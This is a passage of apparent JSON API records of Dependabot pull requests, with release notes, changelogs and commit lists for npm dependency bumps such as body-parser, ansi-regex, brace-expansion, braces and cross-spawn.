href=\"https://github.com/expressjs/body-parser/blob/17529513673e39ba79886a7ce3363320cf1c0c50/README.md#depth\"\u003eDocumentation\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eOther changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003echore: add support for OSSF scorecard reporting by \u003ca href=\"https://github.com/inigomarquinez\"\u003e\u003ccode\u003e@​inigomarquinez\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/522\"\u003eexpressjs/body-parser#522\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: fix errors in ci github action for node 8 and 9 by \u003ca href=\"https://github.com/inigomarquinez\"\u003e\u003ccode\u003e@​inigomarquinez\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/523\"\u003eexpressjs/body-parser#523\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: pin to node@22.4.1 by \u003ca href=\"https://github.com/wesleytodd\"\u003e\u003ccode\u003e@​wesleytodd\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/527\"\u003eexpressjs/body-parser#527\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: qs@6.12.3 by \u003ca href=\"https://github.com/melikhov-dev\"\u003e\u003ccode\u003e@​melikhov-dev\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/521\"\u003eexpressjs/body-parser#521\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd OSSF Scorecard badge by \u003ca href=\"https://github.com/bjohansebas\"\u003e\u003ccode\u003e@​bjohansebas\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/531\"\u003eexpressjs/body-parser#531\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eLinter by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/534\"\u003eexpressjs/body-parser#534\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRelease: 1.20.3 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/535\"\u003eexpressjs/body-parser#535\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/expressjs/body-parser/blob/1.20.5/HISTORY.md\"\u003ebody-parser's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.20.5 / 2026-04-24\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003erefactor(json): simplify strict mode error string construction\u003c/li\u003e\n\u003cli\u003efix: extended urlencoded parsing of arrays with \u0026gt;100 elements (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/716\"\u003e#716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edeps: qs@~6.15.1\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.20.4 / 2025-12-01\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003edeps: qs@~6.14.0\u003c/li\u003e\n\u003cli\u003edeps: use tilde notation for dependencies\u003c/li\u003e\n\u003cli\u003edeps: http-errors@~2.0.1\u003c/li\u003e\n\u003cli\u003edeps: raw-body@~2.5.3\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.20.3 / 2024-09-10\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003edeps: qs@6.13.0\u003c/li\u003e\n\u003cli\u003eadd \u003ccode\u003edepth\u003c/code\u003e option to customize the depth level in the parser\u003c/li\u003e\n\u003cli\u003eIMPORTANT: The default \u003ccode\u003edepth\u003c/code\u003e level for parsing URL-encoded data is now \u003ccode\u003e32\u003c/code\u003e (previously was \u003ccode\u003eInfinity\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.20.2 / 2023-02-21\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFix strict json error message on Node.js 19+\u003c/li\u003e\n\u003cli\u003edeps: content-type@~1.0.5\n\u003cul\u003e\n\u003cli\u003eperf: skip value escaping when unnecessary\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: raw-body@2.5.2\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.20.1 / 2022-10-06\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003edeps: qs@6.11.0\u003c/li\u003e\n\u003cli\u003eperf: remove unnecessary object clone\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.20.0 / 2022-04-02\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFix error message for json parse whitespace in \u003ccode\u003estrict\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix internal error when inflated body exceeds limit\u003c/li\u003e\n\u003cli\u003ePrevent loss of async hooks context\u003c/li\u003e\n\u003cli\u003ePrevent hanging when request already read\u003c/li\u003e\n\u003cli\u003edeps: depd@2.0.0\n\u003cul\u003e\n\u003cli\u003eReplace internal \u003ccode\u003eeval\u003c/code\u003e usage with \u003ccode\u003eFunction\u003c/code\u003e constructor\u003c/li\u003e\n\u003cli\u003eUse instance methods on \u003ccode\u003eprocess\u003c/code\u003e to check for listeners\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: http-errors@2.0.0\n\u003cul\u003e\n\u003cli\u003edeps: depd@2.0.0\u003c/li\u003e\n\u003cli\u003edeps: statuses@2.0.1\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: on-finished@2.4.1\u003c/li\u003e\n\u003cli\u003edeps: qs@6.10.3\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/0defdbe7f95ad0d3bc007d3a7c59c8c0ab9e6575\"\u003e\u003ccode\u003e0defdbe\u003c/code\u003e\u003c/a\u003e release(patch): 1.20.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/cd0e7a000c53e7be7262d303e57a352b6a00db7f\"\u003e\u003ccode\u003ecd0e7a0\u003c/code\u003e\u003c/a\u003e deps(qs): bump qs to 6.15.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/6f24d7e8bcd9860b136920926ce86da1a7dd1d51\"\u003e\u003ccode\u003e6f24d7e\u003c/code\u003e\u003c/a\u003e fix: correct off-by-one error in parameterCount (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/716\"\u003e#716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/b849bd533d8b4abf5576a3e301f28d9befa05ddd\"\u003e\u003ccode\u003eb849bd5\u003c/code\u003e\u003c/a\u003e deps: qs@~6.14.1 (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/690\"\u003e#690\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/2c55e2f712f320a8e8d0f9fcb1d06526d0e401c9\"\u003e\u003ccode\u003e2c55e2f\u003c/code\u003e\u003c/a\u003e refactor(json): simplify strict mode error string construction (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/692\"\u003e#692\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/7db202cac84a001e6566c2dc6516b44db98beff3\"\u003e\u003ccode\u003e7db202c\u003c/code\u003e\u003c/a\u003e 1.20.4 (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/672\"\u003e#672\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/d8f8adb898676dfdf997b4455e5f9b689b53e989\"\u003e\u003ccode\u003ed8f8adb\u003c/code\u003e\u003c/a\u003e ci: add CodeQL (SAST) (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/670\"\u003e#670\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/6d133c19b3e7c0bb8301959ca1dba283d23d23c3\"\u003e\u003ccode\u003e6d133c1\u003c/code\u003e\u003c/a\u003e chore: remove SECURITY.md (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/669\"\u003e#669\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/fcd15355041ada6f37288dd13858d50429016b66\"\u003e\u003ccode\u003efcd1535\u003c/code\u003e\u003c/a\u003e deps: use tilde notation and update certain dependencies (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/668\"\u003e#668\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/ec5fa290d25d85e0049757e240249072331eaee6\"\u003e\u003ccode\u003eec5fa29\u003c/code\u003e\u003c/a\u003e deps: qs@~6.14.0 (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/664\"\u003e#664\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/expressjs/body-parser/compare/1.19.0...1.20.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~jonchurch\"\u003ejonchurch\u003c/a\u003e, a new releaser for body-parser since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `express` from 4.17.1 to 4.22.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from ...\n\n_Description has been truncated_","html_url":"https://github.com/SherfeyInv/updater-action/pull/43","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/SherfeyInv%2Fupdater-action/issues/43","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/43/packages"},{"uuid":"4289497699","node_id":"PR_kwDOEitXEs7TpsXW","number":7612,"state":"closed","title":"chore(deps): bump the npm_and_yarn group across 3 directories with 19 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":2,"pull_request":true,"closed_at":"2026-04-19T00:52:52.000Z","author_association":null,"state_reason":null,"created_at":"2026-04-18T23:45:07.000Z","updated_at":"2026-04-19T00:53:01.000Z","time_to_close":4065,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"npm_and_yarn","update_count":19,"packages":[{"name":"@octokit/plugin-paginate-rest","old_version":"2.17.0","new_version":"removed","repository_url":"https://github.com/octokit/plugin-paginate-rest.js"},{"name":"@tootallnate/once","old_version":"1.1.2","new_version":"removed","repository_url":"https://github.com/TooTallNate/once"},{"name":"ansi-regex","old_version":"3.0.0","new_version":"3.0.1","repository_url":"https://github.com/chalk/ansi-regex"},{"name":"ansi-regex","old_version":"5.0.0","new_version":"5.0.1","repository_url":"https://github.com/chalk/ansi-regex"},{"name":"ansi-regex","old_version":"4.1.0","new_version":"4.1.1","repository_url":"https://github.com/chalk/ansi-regex"},{"name":"brace-expansion","old_version":"1.1.11","new_version":"1.1.14","repository_url":"https://github.com/juliangruber/brace-expansion"},{"name":"debug","old_version":"4.2.0","new_version":"4.3.1","repository_url":"https://github.com/debug-js/debug"},{"name":"flatted","old_version":"2.0.2","new_version":"3.4.2","repository_url":"https://github.com/WebReflection/flatted"},{"name":"word-wrap","old_version":"1.2.3","new_version":"1.2.5","repository_url":"https://github.com/jonschlinkert/word-wrap"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 7 updates in the /.automation/test/repository_osv_scanner/bad directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js) | `2.17.0` | `removed` |\n| [@tootallnate/once](https://github.com/TooTallNate/once) | `1.1.2` | `removed` |\n| [ansi-regex](https://github.com/chalk/ansi-regex) | `3.0.0` | `3.0.1` |\n| [ansi-regex](https://github.com/chalk/ansi-regex) | `5.0.0` | `5.0.1` |\n| [ansi-regex](https://github.com/chalk/ansi-regex) | `4.1.0` | `4.1.1` |\n| [brace-expansion](https://github.com/juliangruber/brace-expansion) | `1.1.11` | `1.1.14` |\n| [debug](https://github.com/debug-js/debug) | `4.2.0` | `4.3.1` |\n| [flatted](https://github.com/WebReflection/flatted) | `2.0.2` | `3.4.2` |\n| [word-wrap](https://github.com/jonschlinkert/word-wrap) | `1.2.3` | `1.2.5` |\n\nBumps the npm_and_yarn group with 7 updates in the /.automation/test/repository_grype/bad directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js) | `2.17.0` | `removed` |\n| [@tootallnate/once](https://github.com/TooTallNate/once) | `1.1.2` | `removed` |\n| [ansi-regex](https://github.com/chalk/ansi-regex) | `3.0.0` | `3.0.1` |\n| [ansi-regex](https://github.com/chalk/ansi-regex) | `5.0.0` | `5.0.1` |\n| [ansi-regex](https://github.com/chalk/ansi-regex) | `4.1.0` | `4.1.1` |\n| [brace-expansion](https://github.com/juliangruber/brace-expansion) | `1.1.11` | `1.1.14` |\n| [debug](https://github.com/debug-js/debug) | `4.2.0` | `4.3.1` |\n| [flatted](https://github.com/WebReflection/flatted) | `2.0.2` | `3.4.2` |\n| [word-wrap](https://github.com/jonschlinkert/word-wrap) | `1.2.3` | `1.2.5` |\n\nBumps the npm_and_yarn group with 3 updates in the /.automation/test/repository_syft directory: [ansi-regex](https://github.com/chalk/ansi-regex), [diff](https://github.com/kpdecker/jsdiff) and [word-wrap](https://github.com/jonschlinkert/word-wrap).\n\nRemoves `@octokit/plugin-paginate-rest`\n\nRemoves `@tootallnate/once`\n\nUpdates `ansi-regex` from 3.0.0 to 3.0.1\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chalk/ansi-regex/commit/f545bdb80048f527889eddb9ac1a851c6f2a2241\"\u003e\u003ccode\u003ef545bdb\u003c/code\u003e\u003c/a\u003e 3.0.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chalk/ansi-regex/commit/c57d4c2fdbe0357a0f6dd42d1160defdc9fffdf5\"\u003e\u003ccode\u003ec57d4c2\u003c/code\u003e\u003c/a\u003e fix a few old XO issues for backport\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chalk/ansi-regex/commit/419250fa510bf31b4cc672e76537a64f9332e1f1\"\u003e\u003ccode\u003e419250f\u003c/code\u003e\u003c/a\u003e Fix potential ReDoS (\u003ca href=\"https://redirect.github.com/chalk/ansi-regex/issues/37\"\u003e#37\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/chalk/ansi-regex/compare/v3.0.0...v3.0.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `ansi-regex` from 5.0.0 to 5.0.1\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chalk/ansi-regex/commit/f545bdb80048f527889eddb9ac1a851c6f2a2241\"\u003e\u003ccode\u003ef545bdb\u003c/code\u003e\u003c/a\u003e 3.0.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chalk/ansi-regex/commit/c57d4c2fdbe0357a0f6dd42d1160defdc9fffdf5\"\u003e\u003ccode\u003ec57d4c2\u003c/code\u003e\u003c/a\u003e fix a few old XO issues for backport\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chalk/ansi-regex/commit/419250fa510bf31b4cc672e76537a64f9332e1f1\"\u003e\u003ccode\u003e419250f\u003c/code\u003e\u003c/a\u003e Fix potential ReDoS (\u003ca href=\"https://redirect.github.com/chalk/ansi-regex/issues/37\"\u003e#37\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/chalk/ansi-regex/compare/v3.0.0...v3.0.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `ansi-regex` from 4.1.0 to 4.1.1\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chalk/ansi-regex/commit/f545bdb80048f527889eddb9ac1a851c6f2a2241\"\u003e\u003ccode\u003ef545bdb\u003c/code\u003e\u003c/a\u003e 3.0.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chalk/ansi-regex/commit/c57d4c2fdbe0357a0f6dd42d1160defdc9fffdf5\"\u003e\u003ccode\u003ec57d4c2\u003c/code\u003e\u003c/a\u003e fix a few old XO issues for backport\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chalk/ansi-regex/commit/419250fa510bf31b4cc672e76537a64f9332e1f1\"\u003e\u003ccode\u003e419250f\u003c/code\u003e\u003c/a\u003e Fix potential ReDoS (\u003ca href=\"https://redirect.github.com/chalk/ansi-regex/issues/37\"\u003e#37\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/chalk/ansi-regex/compare/v3.0.0...v3.0.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `brace-expansion` from 1.1.11 to 1.1.14\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/juliangruber/brace-expansion/releases\"\u003ebrace-expansion's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.1.12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003epkg: publish on tag 1.x  c460dbd\u003c/li\u003e\n\u003cli\u003efmt  ccb8ac6\u003c/li\u003e\n\u003cli\u003eFix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)  c3c73c8\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\"\u003ehttps://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/10c05fcf3699b1a29ef5e611c011af3d3c97e6e3\"\u003e\u003ccode\u003e10c05fc\u003c/code\u003e\u003c/a\u003e 1.1.14\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/1afa1b22ead12f6a7a02f25bf0f7d64c2439b007\"\u003e\u003ccode\u003e1afa1b2\u003c/code\u003e\u003c/a\u003e Add opt-in { max } mitigation to v1 legacy line (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/103\"\u003e#103\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/2fbb6a2aa0f984bb2fb5f60252ca6cba3e1368ec\"\u003e\u003ccode\u003e2fbb6a2\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;Backport fix for GHSA-7h2j-956f-4vf2 to v1 (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/101\"\u003e#101\u003c/a\u003e)\u0026quot; (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/102\"\u003e#102\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/0d7652e3093d3273151729812f9b0b79a17ecba6\"\u003e\u003ccode\u003e0d7652e\u003c/code\u003e\u003c/a\u003e Backport fix for GHSA-7h2j-956f-4vf2 to v1 (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/101\"\u003e#101\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/6c353caf23beb9644f858eb3fe38d43a68b82898\"\u003e\u003ccode\u003e6c353ca\u003c/code\u003e\u003c/a\u003e 1.1.13\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2\"\u003e\u003ccode\u003e7fd684f\u003c/code\u003e\u003c/a\u003e Backport fix for GHSA-f886-m6hf-6m8v (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/95\"\u003e#95\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/44f33b47c5c6a965d507421af43e86cf5971d711\"\u003e\u003ccode\u003e44f33b4\u003c/code\u003e\u003c/a\u003e 1.1.12\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c460dbd68e428d147b2080622d8ce126c7a08570\"\u003e\u003ccode\u003ec460dbd\u003c/code\u003e\u003c/a\u003e pkg: publish on tag 1.x\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/ccb8ac6d4292b7661b677fe048ba6690c877f51f\"\u003e\u003ccode\u003eccb8ac6\u003c/code\u003e\u003c/a\u003e fmt\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c3c73c8b088defc70851843be88ccc3af08e7217\"\u003e\u003ccode\u003ec3c73c8\u003c/code\u003e\u003c/a\u003e Fix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/1.1.11...v1.1.14\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `braces` from 3.0.2 to 3.0.3\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/74b2db2938fad48a2ea54a9c8bf27a37a62c350d\"\u003e\u003ccode\u003e74b2db2\u003c/code\u003e\u003c/a\u003e 3.0.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/88f1429a0f47e1dd3813de35211fc97ffda27f9e\"\u003e\u003ccode\u003e88f1429\u003c/code\u003e\u003c/a\u003e update eslint. lint, fix unit tests.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/415d660c3002d1ab7e63dbf490c9851da80596ff\"\u003e\u003ccode\u003e415d660\u003c/code\u003e\u003c/a\u003e Snyk js braces 6838727 (\u003ca href=\"https://redirect.github.com/micromatch/braces/issues/40\"\u003e#40\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/190510f79db1adf21d92798b0bb6fccc1f72c9d6\"\u003e\u003ccode\u003e190510f\u003c/code\u003e\u003c/a\u003e fix tests, skip 1 test in test/braces.expand\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/716eb9f12d820b145a831ad678618731927e8856\"\u003e\u003ccode\u003e716eb9f\u003c/code\u003e\u003c/a\u003e readme bump\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/a5851e57f45c3431a94d83fc565754bc10f5bbc3\"\u003e\u003ccode\u003ea5851e5\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/micromatch/braces/issues/37\"\u003e#37\u003c/a\u003e from coderaiser/fix/vulnerability\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/2092bd1fb108d2c59bd62e243b70ad98db961538\"\u003e\u003ccode\u003e2092bd1\u003c/code\u003e\u003c/a\u003e feature: braces: add maxSymbols (\u003ca href=\"https://github.com/micromatch/braces/issues/\"\u003ehttps://github.com/micromatch/braces/issues/\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/9f5b4cf47329351bcb64287223ffb6ecc9a5e6d3\"\u003e\u003ccode\u003e9f5b4cf\u003c/code\u003e\u003c/a\u003e fix: vulnerability (\u003ca href=\"https://security.snyk.io/vuln/SNYK-JS-BRACES-6838727\"\u003ehttps://security.snyk.io/vuln/SNYK-JS-BRACES-6838727\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/98414f9f1fabe021736e26836d8306d5de747e0d\"\u003e\u003ccode\u003e98414f9\u003c/code\u003e\u003c/a\u003e remove funding file\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/665ab5d561c017a38ba7aafd92cc6655b91d8c14\"\u003e\u003ccode\u003e665ab5d\u003c/code\u003e\u003c/a\u003e update keepEscaping doc (\u003ca href=\"https://redirect.github.com/micromatch/braces/issues/27\"\u003e#27\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/micromatch/braces/compare/3.0.2...3.0.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `cross-spawn` from 7.0.3 to 7.0.6\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/moxystudio/node-cross-spawn/blob/master/CHANGELOG.md\"\u003ecross-spawn's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/compare/v7.0.5...v7.0.6\"\u003e7.0.6\u003c/a\u003e (2024-11-18)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eupdate cross-spawn version to 7.0.5 in package-lock.json (\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/f700743918d901eff92960e15a8dd68f87bd4176\"\u003ef700743\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/compare/v7.0.4...v7.0.5\"\u003e7.0.5\u003c/a\u003e (2024-11-07)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efix escaping bug introduced by backtracking (\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/640d391fde65388548601d95abedccc12943374f\"\u003e640d391\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/compare/v7.0.3...v7.0.4\"\u003e7.0.4\u003c/a\u003e (2024-11-07)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003edisable regexp backtracking (\u003ca href=\"https://redirect.github.com/moxystudio/node-cross-spawn/issues/160\"\u003e#160\u003c/a\u003e) (\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/5ff3a07d9add449021d806e45c4168203aa833ff\"\u003e5ff3a07\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/77cd97f3ca7b62c904a63a698fc4a79bf41977d0\"\u003e\u003ccode\u003e77cd97f\u003c/code\u003e\u003c/a\u003e chore(release): 7.0.6\u003c/li\u003e\n\u003cli\u003e\u003ca 